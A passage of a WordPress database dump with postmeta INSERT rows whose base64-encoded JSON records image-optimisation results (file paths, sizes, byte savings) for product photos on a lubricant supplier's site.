LTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTE5NzQsInRpbWUiOjE0ODM1NjM0OTcsImlkIjoxNzg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTU5LCJ0aW1lIjoxNDgzNTYzNTAwLCJpZCI6MTc4NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjQ3MiwidGltZSI6MTQ4MzU2MzUwMywiaWQiOjE3ODR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzgsInRpbWUiOjE0ODM1NjM1MDcsImlkIjoxNzg0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTc5OCwidGltZSI6MTQ4MzU2MzUxMCwiaWQiOjE3ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQzNiwidGltZSI6MTQ4MzU2MzUxNCwiaWQiOjE3ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjc2MSwidGltZSI6MTQ4MzU2MzUxNywiaWQiOjE3ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjc1MiwidGltZSI6MTQ4MzU2MzUyMCwiaWQiOjE3ODR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9UZWZsb24tU2lsaWNvbmUtbHVicmljYW50LTEtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEwMTMsInRpbWUiOjE0ODM1NjM1MjQsImlkIjoxNzg0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1RlZmxvbi1TaWxpY29uZS1sdWJyaWNhbnQtMS05MHg5MC5qcGciLCJ3aWR0aCI6IjkwIiwiaGVpZ2h0IjoiOTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvVGVmbG9uLVNpbGljb25lLWx1YnJpY2FudC0xLTkweDkwLmpwZyIsInJlZHVjdGlvbiI6MzkxLCJ0aW1lIjoxNDgzNTYzNTI3LCJpZCI6MTc4NH1d'); 
INSERT INTO `wp_postmeta` VALUES (29188, 1783, 'wpfc_optimisation_reduction', '25573'); 
INSERT INTO `wp_postmeta` VALUES (29189, 1783, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLmpwZyIsIndpZHRoIjo1MTg0LCJoZWlnaHQiOjM0NTYsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NjM1MzIsImlkIjoiMTc4MyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSDA4MDVBLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo4NjMsInRpbWUiOjE0ODM1NjM1MzUsImlkIjoxNzgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS04MDB4NTMzLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MjkxOSwidGltZSI6MTQ4MzU2MzUzOCwiaWQiOjE3ODN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSDA4MDVBLTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoyNTk5LCJ0aW1lIjoxNDgzNTYzNTQyLCJpZCI6MTc4M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTE2MDB4MTA2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MTI2NjksInRpbWUiOjE0ODM1NjM1NDYsImlkIjoxNzgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTk5LCJ0aW1lIjoxNDgzNTYzNTQ5LCJpZCI6MTc4M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUyNywidGltZSI6MTQ4MzU2MzU1MiwiaWQiOjE3ODN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSDA4MDVBLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1ODMsInRpbWUiOjE0ODM1NjM1NTYsImlkIjoxNzgzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0gwODA1QS01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0gwODA1QS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTg3NCwidGltZSI6MTQ4MzU2MzU1OSwiaWQiOjE3ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjQxMiwidGltZSI6MTQ4MzU2MzU2MiwiaWQiOjE3ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjU3MSwidGltZSI6MTQ4MzU2MzU2NiwiaWQiOjE3ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjYzMiwidGltZSI6MTQ4MzU2MzU2OSwiaWQiOjE3ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjk0NywidGltZSI6MTQ4MzU2MzU3MywiaWQiOjE3ODN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IMDgwNUEtOTB4OTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSDA4MDVBLTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IMDgwNUEtOTB4OTAuanBnIiwicmVkdWN0aW9uIjozNzgsInRpbWUiOjE0ODM1NjM1NzYsImlkIjoxNzgzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29190, 1782, 'wpfc_optimisation_reduction', '28207'); 
INSERT INTO `wp_postmeta` VALUES (29191, 1782, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2MzU4MSwiaWQiOiIxNzgyIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk3OSwidGltZSI6MTQ4MzU2MzU4NCwiaWQiOjE3ODJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMzIxLCJ0aW1lIjoxNDgzNTYzNTg4LCJpZCI6MTc4Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04MjAwLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODIwMC03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTgyMDAtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI5NTYsInRpbWUiOjE0ODM1NjM1OTEsImlkIjoxNzgyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lz